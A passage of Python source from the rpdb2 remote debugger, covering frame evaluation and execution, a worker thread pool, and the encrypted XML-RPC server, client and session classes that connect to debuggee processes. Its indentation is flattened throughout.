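# calc_expr() may run on a worker thread or be forwarded to the debugged
# thread via send_job(); the lock/index protocol above ensures that a
# result arriving after get_namespace() has already timed out and appended
# its 'error' placeholder is silently dropped rather than appended twice.
#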
def __calc_encoding(self, encoding, fvalidate = False, filename = None):
if encoding != ENCODING_AUTO and not fvalidate:
return encoding
if encoding != ENCODING_AUTO:
try:
codecs.lookup(encoding)
return encoding
except:
pass
if filename == None:
ctx = self.get_current_ctx()
filename = ctx.m_code_context.m_filename
try:
encoding = get_file_encoding(filename)
return encoding
except:
return 'utf-8'
def get_namespace(self, nl, filter_level, frame_index, fException, repr_limit, encoding, fraw):
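#
# nl is a list of (expr, fExpand) pairs, e.g. [(as_unicode('locals()'), True)]
# (illustrative value only); each expression is evaluated in the selected
# frame and expanded into subnodes when fExpand is set.
#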
if fraw:
encoding = ENCODING_RAW_I
else:
encoding = self.__calc_encoding(encoding, fvalidate = True)
try:
(_globals, _locals, x) = self.__get_locals_globals(frame_index, fException, fReadOnly = True)
except:
print_debug_exception()
raise
failed_expr_list = []
rl = []
index = 0
lock = threading.Condition()
for (expr, fExpand) in nl:
if self.is_child_of_failure(failed_expr_list, expr):
continue
event = threading.Event()
args = (expr, fExpand, filter_level, frame_index, fException, _globals, _locals, lock, event, rl, index, repr_limit, encoding)
if self.m_fsynchronicity:
g_server.m_work_queue.post_work_item(target = self.calc_expr, args = args, name = 'calc_expr %s' % expr)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 0, self.calc_expr, *args)
except:
pass
safe_wait(event, 2)
lock.acquire()
if len(rl) == index:
rl.append('error')
failed_expr_list.append(expr)
index += 1
lock.release()
if len(failed_expr_list) > 3:
break
_rl = [r for r in rl if r != 'error']
return _rl
def evaluate(self, expr, frame_index, fException, encoding, fraw):
"""
Evaluate expression in context of frame at depth 'frame-index'.
"""
result = [(as_unicode(''), as_unicode(STR_SYNCHRONICITY_BAD), as_unicode(''))]
if self.m_fsynchronicity:
self._evaluate(result, expr, frame_index, fException, encoding, fraw)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 1000, self._evaluate, result, expr, frame_index, fException, encoding, fraw)
except:
pass
return result[-1]
def _evaluate(self, result, expr, frame_index, fException, encoding, fraw):
"""
Evaluate expression in context of frame at depth 'frame-index'.
"""
encoding = self.__calc_encoding(encoding)
(_globals, _locals, x) = self.__get_locals_globals(frame_index, fException)
v = ''
w = ''
e = ''
try:
if '_rpdb2_pwd' in expr or '_rpdb2_args' in expr:
r = '...Removed-password-from-output...'
else:
_expr = as_bytes(ENCODING_SOURCE % encoding + expr, encoding, fstrict = True)
if '_RPDB2_builtins' in expr:
_locals['_RPDB2_builtins'] = vars(g_builtins_module)
try:
redirect_exc_info = True
r = eval(_expr, _globals, _locals)
finally:
del redirect_exc_info
if '_RPDB2_builtins' in expr:
del _locals['_RPDB2_builtins']
if fraw:
encoding = ENCODING_RAW_I
v = repr_ltd(r, MAX_EVALUATE_LENGTH, encoding)
if len(v) > MAX_EVALUATE_LENGTH:
v += '... *** %s ***' % STR_MAX_EVALUATE_LENGTH_WARNING
w = STR_MAX_EVALUATE_LENGTH_WARNING
except:
exc_info = sys.exc_info()
e = "%s, %s" % (safe_str(exc_info[0]), safe_str(exc_info[1]))
self.notify_namespace()
result.append((as_unicode(v), as_unicode(w), as_unicode(e)))
def execute(self, suite, frame_index, fException, encoding):
"""
Execute suite (Python statement) in context of frame at
depth 'frame-index'.
"""
result = [(as_unicode(STR_SYNCHRONICITY_BAD), as_unicode(''))]
if self.m_fsynchronicity:
self._execute(result, suite, frame_index, fException, encoding)
else:
try:
ctx = self.get_current_ctx()
tid = ctx.m_thread_id
send_job(tid, 1000, self._execute, result, suite, frame_index, fException, encoding)
except:
pass
return result[-1]
def _execute(self, result, suite, frame_index, fException, encoding):
"""
Execute suite (Python statement) in context of frame at
depth 'frame-index'.
"""
print_debug('exec called with: ' + repr(suite))
encoding = self.__calc_encoding(encoding)
(_globals, _locals, _original_locals_copy) = self.__get_locals_globals(frame_index, fException)
if frame_index > 0 and not _globals is _locals:
_locals_copy = copy.copy(_locals)
w = ''
e = ''
try:
if '_RPDB2_FindRepr' in suite and not '_RPDB2_FindRepr' in _original_locals_copy:
_locals['_RPDB2_FindRepr'] = _RPDB2_FindRepr
try:
_suite = as_bytes(ENCODING_SOURCE % encoding + suite, encoding, fstrict = True)
#print_debug('suite is %s' % repr(_suite))
_code = compile(_suite, '<string>', 'exec')
try:
redirect_exc_info = True
exec(_code, _globals, _locals)
finally:
del redirect_exc_info
finally:
if '_RPDB2_FindRepr' in suite and not '_RPDB2_FindRepr' in _original_locals_copy:
del _locals['_RPDB2_FindRepr']
except:
exc_info = sys.exc_info()
e = "%s, %s" % (safe_str(exc_info[0]), safe_str(exc_info[1]))
if frame_index > 0 and (not _globals is _locals) and _locals != _locals_copy:
l = [(k, safe_repr(v)) for k, v in _locals.items()]
sl = set(l)
lc = [(k, safe_repr(v)) for k, v in _locals_copy.items()]
slc = set(lc)
nsc = [k for (k, v) in sl - slc if k in _original_locals_copy]
if len(nsc) != 0:
w = STR_LOCAL_NAMESPACE_WARNING
self.notify_namespace()
result.append((as_unicode(w), as_unicode(e)))
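#
# Note on the warning above: when executing in a frame other than the
# topmost one, changes made to fast locals generally do not propagate back
# to the frame. The locals snapshot taken before exec() is compared with
# the post-exec locals, and STR_LOCAL_NAMESPACE_WARNING is reported if a
# pre-existing local appears to have been modified.
#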
def __decode_thread_name(self, name):
name = as_unicode(name)
return name
def get_thread_list(self):
"""
Return thread list with tid, state, and last event of each thread.
"""
ctx = self.get_current_ctx()
if ctx is None:
current_thread_id = -1
else:
current_thread_id = ctx.m_thread_id
ctx_list = list(self.get_threads().values())
tl = []
for c in ctx_list:
d = {}
d[DICT_KEY_TID] = c.m_thread_id
d[DICT_KEY_NAME] = self.__decode_thread_name(c.m_thread_name)
d[DICT_KEY_BROKEN] = c.m_fBroken
d[DICT_KEY_EVENT] = as_unicode(c.m_event)
tl.append(d)
return (current_thread_id, tl)
def stop_debuggee(self):
"""
Notify the client and terminate this process.
"""
g_server.m_work_queue.post_work_item(target = _atexit, args = (True, ), name = '_atexit')
def set_synchronicity(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
event = CEventSynchronicity(fsynchronicity)
self.m_event_dispatcher.fire_event(event)
if self.m_state_manager.get_state() == STATE_BROKEN:
self.notify_namespace()
def set_trap_unhandled_exceptions(self, ftrap):
self.m_ftrap = ftrap
event = CEventTrap(ftrap)
self.m_event_dispatcher.fire_event(event)
def is_unhandled_exception(self):
return self.m_fUnhandledException
def set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
event = CEventForkMode(ffork_into_child, ffork_auto)
self.m_event_dispatcher.fire_event(event)
def set_environ(self, envmap):
global g_fignorefork
print_debug('Entered set_environ() with envmap = %s' % repr(envmap))
if len(envmap) == 0:
return
old_pythonpath = os.environ.get('PYTHONPATH', '')
encoding = detect_locale()
for k, v in envmap:
try:
k = as_string(k, encoding, fstrict = True)
v = as_string(v, encoding, fstrict = True)
except:
continue
command = 'echo %s' % v
try:
g_fignorefork = True
f = platform.popen(command)
finally:
g_fignorefork = False
value = f.read()
f.close()
if value[-1:] == '\n':
value = value[:-1]
os.environ[k] = value
if 'PYTHONPATH' in [k for (k, v) in envmap]:
recalc_sys_path(old_pythonpath)
#
# ------------------------------------- RPC Server --------------------------------------------
#
class CWorkQueue:
"""
Worker thread pool for the RPC server.
"""
def __init__(self, size = N_WORK_QUEUE_THREADS):
self.m_lock = threading.Condition()
self.m_work_items = []
self.m_f_shutdown = False
self.m_size = size
self.m_n_threads = 0
self.m_n_available = 0
self.__create_thread()
def __create_thread(self):
t = CThread(name = '__worker_target', target = self.__worker_target, shutdown = self.shutdown)
#thread_set_daemon(t, True)
t.start()
def shutdown(self):
"""
Signal worker threads to exit, and wait until they do.
"""
if self.m_f_shutdown:
return
print_debug('Shutting down worker queue...')
self.m_lock.acquire()
self.m_f_shutdown = True
lock_notify_all(self.m_lock)
t0 = time.time()
while self.m_n_threads > 0:
if time.time() - t0 > SHUTDOWN_TIMEOUT:
self.m_lock.release()
print_debug('Shut down of worker queue has TIMED OUT!')
return
safe_wait(self.m_lock, 0.1)
self.m_lock.release()
print_debug('Shutting down worker queue, done.')
def __worker_target(self):
try:
self.m_lock.acquire()
self.m_n_threads += 1
self.m_n_available += 1
fcreate_thread = not self.m_f_shutdown and self.m_n_threads < self.m_size
self.m_lock.release()
if fcreate_thread:
self.__create_thread()
self.m_lock.acquire()
while not self.m_f_shutdown:
safe_wait(self.m_lock)
if self.m_f_shutdown:
break
if len(self.m_work_items) == 0:
continue
fcreate_thread = self.m_n_available == 1
(target, args, name) = self.m_work_items.pop()
self.m_n_available -= 1
self.m_lock.release()
if fcreate_thread:
print_debug('Creating an extra worker thread.')
self.__create_thread()
thread_set_name(current_thread(), '__worker_target - ' + name)
try:
target(*args)
except:
print_debug_exception()
thread_set_name(current_thread(), '__worker_target')
self.m_lock.acquire()
self.m_n_available += 1
if self.m_n_available > self.m_size:
break
self.m_n_threads -= 1
self.m_n_available -= 1
lock_notify_all(self.m_lock)
finally:
self.m_lock.release()
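#
# Pool growth strategy: the queue starts with a single worker; each new
# worker spawns another until m_size threads exist, and an extra thread is
# created whenever the last available worker picks up an item. Workers
# beyond m_size exit once they become idle again.
#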
def post_work_item(self, target, args, name = ''):
if self.m_f_shutdown:
return
try:
self.m_lock.acquire()
if self.m_f_shutdown:
return
self.m_work_items.append((target, args, name))
self.m_lock.notify()
finally:
self.m_lock.release()
#
# MOD
#
class CUnTracedThreadingMixIn(SocketServer.ThreadingMixIn):
"""
Modification of SocketServer.ThreadingMixIn that uses a worker thread
queue instead of spawning threads to process requests.
This mod was needed to resolve deadlocks that arose in some
circumstances.
"""
def process_request(self, request, client_address):
g_server.m_work_queue.post_work_item(target = SocketServer.ThreadingMixIn.process_request_thread, args = (self, request, client_address), name = 'process_request')
#
# MOD
#
def my_xmlrpclib_loads(data):
"""
Modification of Python 2.3 xmlrpclib.loads() that does not do an
import. Needed to prevent deadlocks.
"""
p, u = xmlrpclib.getparser()
p.feed(data)
p.close()
return u.close(), u.getmethodname()
#
# MOD
#
class CXMLRPCServer(CUnTracedThreadingMixIn, SimpleXMLRPCServer.SimpleXMLRPCServer):
if os.name == POSIX:
allow_reuse_address = True
else:
allow_reuse_address = False
"""
Modification of Python 2.3 SimpleXMLRPCServer.SimpleXMLRPCDispatcher
that uses my_xmlrpclib_loads(). Needed to prevent deadlocks.
"""
def __marshaled_dispatch(self, data, dispatch_method = None):
params, method = my_xmlrpclib_loads(data)
# generate response
try:
if dispatch_method is not None:
response = dispatch_method(method, params)
else:
response = self._dispatch(method, params)
# wrap response in a singleton tuple
response = (response,)
response = xmlrpclib.dumps(response, methodresponse=1)
except xmlrpclib.Fault:
fault = sys.exc_info()[1]
response = xmlrpclib.dumps(fault)
except:
# report exception back to server
response = xmlrpclib.dumps(
xmlrpclib.Fault(1, "%s:%s" % (sys.exc_type, sys.exc_value))
)
print_debug_exception()
return response
if sys.version_info[:2] <= (2, 3):
_marshaled_dispatch = __marshaled_dispatch
#def server_activate(self):
# self.socket.listen(1)
def handle_error(self, request, client_address):
print_debug("handle_error() in pid %d" % _getpid())
if g_ignore_broken_pipe + 5 > time.time():
return
return SimpleXMLRPCServer.SimpleXMLRPCServer.handle_error(self, request, client_address)
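#
# g_ignore_broken_pipe is set to the fork-switch timestamp in
# prepare_fork_step(); broken-pipe style errors reported within the
# following five seconds are expected while clients reconnect, so they are
# suppressed here.
#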
class CPwdServerProxy:
"""
Encrypted proxy to the debuggee.
Works by wrapping an xmlrpclib.ServerProxy object.
"""
def __init__(self, crypto, uri, transport = None, target_rid = 0):
self.m_crypto = crypto
self.m_proxy = xmlrpclib.ServerProxy(uri, transport)
self.m_fEncryption = is_encryption_supported()
self.m_target_rid = target_rid
self.m_method = getattr(self.m_proxy, DISPACHER_METHOD)
def __set_encryption(self, fEncryption):
self.m_fEncryption = fEncryption
def get_encryption(self):
return self.m_fEncryption
def __request(self, name, params):
"""
Call debuggee method 'name' with parameters 'params'.
"""
while True:
try:
#
# Encrypt method and params.
#
fencrypt = self.get_encryption()
args = (as_unicode(name), params, self.m_target_rid)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
rpdb_version = as_unicode(get_interface_compatibility_version())
r = self.m_method(rpdb_version, fencrypt, fcompress, digest, msg)
(fencrypt, fcompress, digest, msg) = r
#
# Decrypt response.
#
((max_index, _r, _e), id) = self.m_crypto.undo_crypto(fencrypt, fcompress, digest, msg, fVerifyIndex = False)
if _e is not None:
raise _e
except AuthenticationBadIndex:
e = sys.exc_info()[1]
self.m_crypto.set_index(e.m_max_index, e.m_anchor)
continue
except xmlrpclib.Fault:
fault = sys.exc_info()[1]
if class_name(BadVersion) in fault.faultString:
s = fault.faultString.split("'")
version = ['', s[1]][len(s) > 1]
raise BadVersion(version)
if class_name(EncryptionExpected) in fault.faultString:
raise EncryptionExpected
elif class_name(EncryptionNotSupported) in fault.faultString:
if self.m_crypto.m_fAllowUnencrypted:
self.__set_encryption(False)
continue
raise EncryptionNotSupported
elif class_name(DecryptionFailure) in fault.faultString:
raise DecryptionFailure
elif class_name(AuthenticationBadData) in fault.faultString:
raise AuthenticationBadData
elif class_name(AuthenticationFailure) in fault.faultString:
raise AuthenticationFailure
else:
print_debug_exception()
assert False
except xmlrpclib.ProtocolError:
print_debug("Caught ProtocolError for %s" % name)
#print_debug_exception()
raise CConnectionException
return _r
def __getattr__(self, name):
return xmlrpclib._Method(self.__request, name)
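#
# Wire format note: each request is the tuple (method name, params,
# target_rid), passed through CCrypto.do_crypto() and sent together with
# the interface compatibility version; the reply is an
# (fencrypt, fcompress, digest, msg) tuple that decrypts to
# (max_index, return value, exception). See dispatcher_method() in
# CIOServer below for the server side of this exchange.
#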
class CIOServer:
"""
Base class for debuggee server.
"""
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid):
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
self.m_thread = None
self.m_crypto = CCrypto(_rpdb2_pwd, fAllowUnencrypted, rid)
self.m_fAllowRemote = fAllowRemote
self.m_rid = rid
self.m_port = None
self.m_stop = False
self.m_server = None
self.m_work_queue = None
def shutdown(self):
self.stop()
def start(self):
self.m_thread = CThread(name = 'ioserver', target = self.run, shutdown = self.shutdown)
thread_set_daemon(self.m_thread, True)
self.m_thread.start()
def jumpstart(self):
self.m_stop = False
self.start()
def stop(self):
if self.m_stop:
return
print_debug('Stopping IO server... (pid = %d)' % _getpid())
self.m_stop = True
while thread_is_alive(self.m_thread):
try:
proxy = CPwdServerProxy(self.m_crypto, calcURL(LOOPBACK, self.m_port), CLocalTimeoutTransport())
proxy.null()
except (socket.error, CException):
pass
self.m_thread.join(0.5)
self.m_thread = None
self.m_work_queue.shutdown()
#try:
# self.m_server.socket.close()
#except:
# pass
print_debug('Stopping IO server, done.')
def export_null(self):
return 0
def run(self):
if self.m_server == None:
(self.m_port, self.m_server) = self.__StartXMLRPCServer()
self.m_work_queue = CWorkQueue()
self.m_server.register_function(self.dispatcher_method)
while not self.m_stop:
self.m_server.handle_request()
def dispatcher_method(self, rpdb_version, fencrypt, fcompress, digest, msg):
"""
Process RPC call.
"""
#print_debug('dispatcher_method() called with: %s, %s, %s, %s' % (rpdb_version, fencrypt, digest, msg[:100]))
if rpdb_version != as_unicode(get_interface_compatibility_version()):
raise BadVersion(as_unicode(get_version()))
try:
try:
#
# Decrypt parameters.
#
((name, __params, target_rid), client_id) = self.m_crypto.undo_crypto(fencrypt, fcompress, digest, msg)
except AuthenticationBadIndex:
e = sys.exc_info()[1]
#print_debug_exception()
#
# Notify the caller on the expected index.
#
max_index = self.m_crypto.get_max_index()
args = (max_index, None, e)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
return (fencrypt, fcompress, digest, msg)
r = None
e = None
try:
#
# We are forcing the 'export_' prefix on methods that are
# callable through XML-RPC to prevent potential security
# problems
#
func = getattr(self, 'export_' + name)
except AttributeError:
raise Exception('method "%s" is not supported' % ('export_' + name))
try:
if (target_rid != 0) and (target_rid != self.m_rid):
raise NotAttached
#
# Record that client id is still attached.
#
self.record_client_heartbeat(client_id, name, __params)
r = func(*__params)
except Exception:
_e = sys.exc_info()[1]
print_debug_exception()
e = _e
#
# Send the encrypted result.
#
max_index = self.m_crypto.get_max_index()
args = (max_index, r, e)
(fcompress, digest, msg) = self.m_crypto.do_crypto(args, fencrypt)
return (fencrypt, fcompress, digest, msg)
except:
print_debug_exception()
raise
def __StartXMLRPCServer(self):
"""
Start the XML-RPC server.
Scans for an available TCP port to listen on.
"""
host = [LOOPBACK, ""][self.m_fAllowRemote]
port = SERVER_PORT_RANGE_START
while True:
try:
server = CXMLRPCServer((host, port), logRequests = 0)
return (port, server)
except socket.error:
e = sys.exc_info()[1]
if GetSocketError(e) != errno.EADDRINUSE:
raise
if port >= SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH - 1:
raise
port += 1
continue
def record_client_heartbeat(self, id, name, params):
pass
class CServerInfo(object):
def __init__(self, age, port, pid, filename, rid, state, fembedded):
assert(is_unicode(rid))
self.m_age = age
self.m_port = port
self.m_pid = pid
self.m_filename = as_unicode(filename, sys.getfilesystemencoding())
self.m_module_name = as_unicode(CalcModuleName(filename), sys.getfilesystemencoding())
self.m_rid = rid
self.m_state = as_unicode(state)
self.m_fembedded = fembedded
def __reduce__(self):
rv = (copy_reg.__newobj__, (type(self), ), vars(self), None, None)
return rv
def __str__(self):
return 'age: %d, port: %d, pid: %d, filename: %s, rid: %s' % (self.m_age, self.m_port, self.m_pid, self.m_filename, self.m_rid)
class CDebuggeeServer(CIOServer):
"""
The debuggee XML RPC server class.
"""
def __init__(self, filename, debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid = None):
if rid is None:
rid = generate_rid()
assert(is_unicode(_rpdb2_pwd))
assert(is_unicode(rid))
CIOServer.__init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid)
self.m_filename = filename
self.m_pid = _getpid()
self.m_time = time.time()
self.m_debugger = debugger
self.m_rid = rid
def shutdown(self):
CIOServer.shutdown(self)
def record_client_heartbeat(self, id, name, params):
finit = (name == 'request_break')
fdetach = (name == 'request_go' and True in params)
self.m_debugger.record_client_heartbeat(id, finit, fdetach)
def export_null(self):
return self.m_debugger.send_event_null()
def export_server_info(self):
age = time.time() - self.m_time
state = self.m_debugger.get_state()
fembedded = self.m_debugger.is_embedded()
si = CServerInfo(age, self.m_port, self.m_pid, self.m_filename, self.m_rid, state, fembedded)
return si
def export_sync_with_events(self, fException, fSendUnhandled):
ei = self.m_debugger.sync_with_events(fException, fSendUnhandled)
return ei
def export_wait_for_event(self, timeout, event_index):
(new_event_index, s) = self.m_debugger.wait_for_event(timeout, event_index)
return (new_event_index, s)
def export_set_breakpoint(self, filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding):
self.m_debugger.set_breakpoint(filename, scope, lineno, fEnabled, expr, frame_index, fException, encoding)
return 0
def export_disable_breakpoint(self, id_list, fAll):
self.m_debugger.disable_breakpoint(id_list, fAll)
return 0
def export_enable_breakpoint(self, id_list, fAll):
self.m_debugger.enable_breakpoint(id_list, fAll)
return 0
def export_delete_breakpoint(self, id_list, fAll):
self.m_debugger.delete_breakpoint(id_list, fAll)
return 0
def export_get_breakpoints(self):
bpl = self.m_debugger.get_breakpoints()
return bpl
def export_request_break(self):
self.m_debugger.request_break()
return 0
def export_request_go(self, fdetach = False):
self.m_debugger.request_go()
return 0
def export_request_go_breakpoint(self, filename, scope, lineno, frame_index, fException):
self.m_debugger.request_go_breakpoint(filename, scope, lineno, frame_index, fException)
return 0
def export_request_step(self):
self.m_debugger.request_step()
return 0
def export_request_next(self):
self.m_debugger.request_next()
return 0
def export_request_return(self):
self.m_debugger.request_return()
return 0
def export_request_jump(self, lineno):
self.m_debugger.request_jump(lineno)
return 0
def export_get_stack(self, tid_list, fAll, fException):
r = self.m_debugger.get_stack(tid_list, fAll, fException)
return r
def export_get_source_file(self, filename, lineno, nlines, frame_index, fException):
r = self.m_debugger.get_source_file(filename, lineno, nlines, frame_index, fException)
return r
def export_get_source_lines(self, nlines, fAll, frame_index, fException):
r = self.m_debugger.get_source_lines(nlines, fAll, frame_index, fException)
return r
def export_get_thread_list(self):
r = self.m_debugger.get_thread_list()
return r
def export_set_thread(self, tid):
self.m_debugger.set_thread(tid)
return 0
def export_get_namespace(self, nl, filter_level, frame_index, fException, repr_limit, encoding, fraw):
r = self.m_debugger.get_namespace(nl, filter_level, frame_index, fException, repr_limit, encoding, fraw)
return r
def export_evaluate(self, expr, frame_index, fException, encoding, fraw):
(v, w, e) = self.m_debugger.evaluate(expr, frame_index, fException, encoding, fraw)
return (v, w, e)
def export_execute(self, suite, frame_index, fException, encoding):
(w, e) = self.m_debugger.execute(suite, frame_index, fException, encoding)
return (w, e)
def export_stop_debuggee(self):
self.m_debugger.stop_debuggee()
return 0
def export_set_synchronicity(self, fsynchronicity):
self.m_debugger.set_synchronicity(fsynchronicity)
return 0
def export_set_trap_unhandled_exceptions(self, ftrap):
self.m_debugger.set_trap_unhandled_exceptions(ftrap)
return 0
def export_is_unhandled_exception(self):
return self.m_debugger.is_unhandled_exception()
def export_set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_debugger.set_fork_mode(ffork_into_child, ffork_auto)
return 0
def export_set_environ(self, envmap):
self.m_debugger.set_environ(envmap)
return 0
def export_embedded_sync(self):
self.m_debugger.embedded_sync()
return 0
#
# ------------------------------------- RPC Client --------------------------------------------
#
#
# MOD
#
class CTimeoutHTTPConnection(httplib.HTTPConnection):
"""
Modification of httplib.HTTPConnection with timeout for sockets.
"""
_rpdb2_timeout = PING_TIMEOUT
def connect(self):
"""Connect to the host and port specified in __init__."""
# New Python version of connect().
if hasattr(self, 'timeout'):
self.timeout = self._rpdb2_timeout
return httplib.HTTPConnection.connect(self)
# Old Python version of connect().
msg = "getaddrinfo returns an empty list"
for res in socket.getaddrinfo(self.host, self.port, 0,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
self.sock = socket.socket(af, socktype, proto)
self.sock.settimeout(self._rpdb2_timeout)
if self.debuglevel > 0:
print_debug("connect: (%s, %s)" % (self.host, self.port))
self.sock.connect(sa)
except socket.error:
msg = sys.exc_info()[1]
if self.debuglevel > 0:
print_debug('connect fail: ' + repr((self.host, self.port)))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error(msg)
#
# MOD
#
class CLocalTimeoutHTTPConnection(CTimeoutHTTPConnection):
"""
Modification of httplib.HTTPConnection with timeout for sockets.
"""
_rpdb2_timeout = LOCAL_TIMEOUT
if is_py3k():
class httplib_HTTP(object):
pass
else:
httplib_HTTP = httplib.HTTP
#
# MOD
#
class CTimeoutHTTP(httplib_HTTP):
"""
Modification of httplib.HTTP with timeout for sockets.
"""
_connection_class = CTimeoutHTTPConnection
#
# MOD
#
class CLocalTimeoutHTTP(httplib_HTTP):
"""
Modification of httplib.HTTP with timeout for sockets.
"""
_connection_class = CLocalTimeoutHTTPConnection
#
# MOD
#
class CLocalTransport(xmlrpclib.Transport):
"""
Modification of xmlrpclib.Transport to work around Zonealarm sockets
bug.
"""
_connection_class = httplib.HTTPConnection
_connection_class_old = httplib_HTTP
def make_connection(self, host):
# New Python version of connect().
# However, make_connection is overridden to always create a new connection;
# otherwise all threads would share a single connection and crash.
if hasattr(self, '_connection'):
chost, self._extra_headers, x509 = self.get_host_info(host)
return self._connection_class(chost)
# Old Python version of connect().
# create a HTTP connection object from a host descriptor
host, extra_headers, x509 = self.get_host_info(host)
return self._connection_class_old(host)
def __parse_response(self, file, sock):
# read response from input file/socket, and parse it
p, u = self.getparser()
while 1:
if sock:
response = sock.recv(1024)
else:
time.sleep(0.002)
response = file.read(1024)
if not response:
break
if self.verbose:
_print("body: " + repr(response))
p.feed(response)
file.close()
p.close()
return u.close()
if os.name == 'nt':
_parse_response = __parse_response
#
# MOD
#
class CTimeoutTransport(CLocalTransport):
"""
Modification of xmlrpclib.Transport with timeout for sockets.
"""
_connection_class = CTimeoutHTTPConnection
_connection_class_old = CTimeoutHTTP
#
# MOD
#
class CLocalTimeoutTransport(CLocalTransport):
"""
Modification of xmlrpclib.Transport with timeout for sockets.
"""
_connection_class = CLocalTimeoutHTTPConnection
_connection_class_old = CLocalTimeoutHTTP
class CSession:
"""
Basic class that communicates with the debuggee server.
"""
def __init__(self, host, port, _rpdb2_pwd, fAllowUnencrypted, rid):
self.m_crypto = CCrypto(_rpdb2_pwd, fAllowUnencrypted, rid)
self.m_host = host
self.m_port = port
self.m_proxy = None
self.m_server_info = None
self.m_exc_info = None
self.m_fShutDown = False
self.m_fRestart = False
def get_encryption(self):
return self.m_proxy.get_encryption()
def getServerInfo(self):
return self.m_server_info
def pause(self):
self.m_fRestart = True
def restart(self, sleep = 0, timeout = 10):
self.m_fRestart = True
time.sleep(sleep)
t0 = time.time()
try:
try:
while time.time() < t0 + timeout:
try:
self.Connect()
return
except socket.error:
continue
raise CConnectionException
except:
self.m_fShutDown = True
raise
finally:
self.m_fRestart = False
def shut_down(self):
self.m_fShutDown = True
def getProxy(self):
"""
Return the proxy object.
With this object you can invoke methods on the server.
"""
while self.m_fRestart:
time.sleep(0.1)
if self.m_fShutDown:
raise NotAttached
return self.m_proxy
def ConnectAsync(self):
t = threading.Thread(target = self.ConnectNoThrow)
#thread_set_daemon(t, True)
t.start()
return t
def ConnectNoThrow(self):
try:
self.Connect()
except:
self.m_exc_info = sys.exc_info()
def Connect(self):
host = self.m_host
if host.lower() == LOCALHOST:
host = LOOPBACK
server = CPwdServerProxy(self.m_crypto, calcURL(host, self.m_port), CTimeoutTransport())
server_info = server.server_info()
self.m_proxy = CPwdServerProxy(self.m_crypto, calcURL(host, self.m_port), CLocalTransport(), target_rid = server_info.m_rid)
self.m_server_info = server_info
def isConnected(self):
return self.m_proxy is not None
class CServerList:
def __init__(self, host):
self.m_host = host
self.m_list = []
self.m_errors = {}
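#
# calcList() probes every port in the server port range concurrently, one
# CSession per port, and keeps the CServerInfo of each debuggee that
# answered, sorted by age. When a key (pid, rid or filename fragment) is
# given, the matching server is returned directly or UnknownServer is
# raised.
#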
def calcList(self, _rpdb2_pwd, rid, key = None):
sil = []
sessions = []
self.m_errors = {}
port = SERVER_PORT_RANGE_START
while port < SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH:
s = CSession(self.m_host, port, _rpdb2_pwd, fAllowUnencrypted = True, rid = rid)
t = s.ConnectAsync()
sessions.append((s, t))
port += 1
for (s, t) in sessions:
t.join()
if (s.m_exc_info is not None):
if not issubclass(s.m_exc_info[0], socket.error):
self.m_errors.setdefault(s.m_exc_info[0], []).append(s.m_exc_info)
continue
si = s.getServerInfo()
if si is not None:
sil.append((-si.m_age, si))
sil.sort()
self.m_list = [s[1] for s in sil]
if key != None:
try:
return self.findServers(key)[0]
except:
pass
if key != None:
raise UnknownServer
return self.m_list
def get_errors(self):
return self.m_errors
def findServers(self, key):
try:
n = int(key)
_s = [s for s in self.m_list if (s.m_pid == n) or (s.m_rid == key)]
except ValueError:
key = as_string(key, sys.getfilesystemencoding())
_s = [s for s in self.m_list if key in s.m_filename]
if _s == []:
raise UnknownServer
return _s
class CSessionManagerInternal:
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
self.m_rpdb2_pwd = [_rpdb2_pwd, None][_rpdb2_pwd in [None, '']]
self.m_fAllowUnencrypted = fAllowUnencrypted
self.m_fAllowRemote = fAllowRemote
self.m_rid = generate_rid()
self.m_host = host
self.m_server_list_object = CServerList(host)
self.m_session = None
self.m_server_info = None
self.m_worker_thread = None
self.m_worker_thread_ident = None
self.m_fStop = False
self.m_stack_depth = None
self.m_stack_depth_exception = None
self.m_frame_index = 0
self.m_frame_index_exception = 0
self.m_completions = {}
self.m_remote_event_index = 0
self.m_event_dispatcher_proxy = CEventDispatcher()
self.m_event_dispatcher = CEventDispatcher(self.m_event_dispatcher_proxy)
self.m_state_manager = CStateManager(STATE_DETACHED, self.m_event_dispatcher, self.m_event_dispatcher_proxy)
self.m_breakpoints_proxy = CBreakPointsManagerProxy(self)
event_type_dict = {CEventState: {EVENT_EXCLUDE: [STATE_BROKEN, STATE_ANALYZE]}}
self.register_callback(self.reset_frame_indexes, event_type_dict, fSingleUse = False)
event_type_dict = {CEventStackDepth: {}}
self.register_callback(self.set_stack_depth, event_type_dict, fSingleUse = False)
event_type_dict = {CEventNoThreads: {}}
self.register_callback(self._reset_frame_indexes, event_type_dict, fSingleUse = False)
event_type_dict = {CEventExit: {}}
self.register_callback(self.on_event_exit, event_type_dict, fSingleUse = False)
event_type_dict = {CEventConflictingModules: {}}
self.register_callback(self.on_event_conflicting_modules, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSignalIntercepted: {}}
self.register_callback(self.on_event_signal_intercept, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSignalException: {}}
self.register_callback(self.on_event_signal_exception, event_type_dict, fSingleUse = False)
event_type_dict = {CEventEmbeddedSync: {}}
self.register_callback(self.on_event_embedded_sync, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSynchronicity: {}}
self.m_event_dispatcher_proxy.register_callback(self.on_event_synchronicity, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
event_type_dict = {CEventTrap: {}}
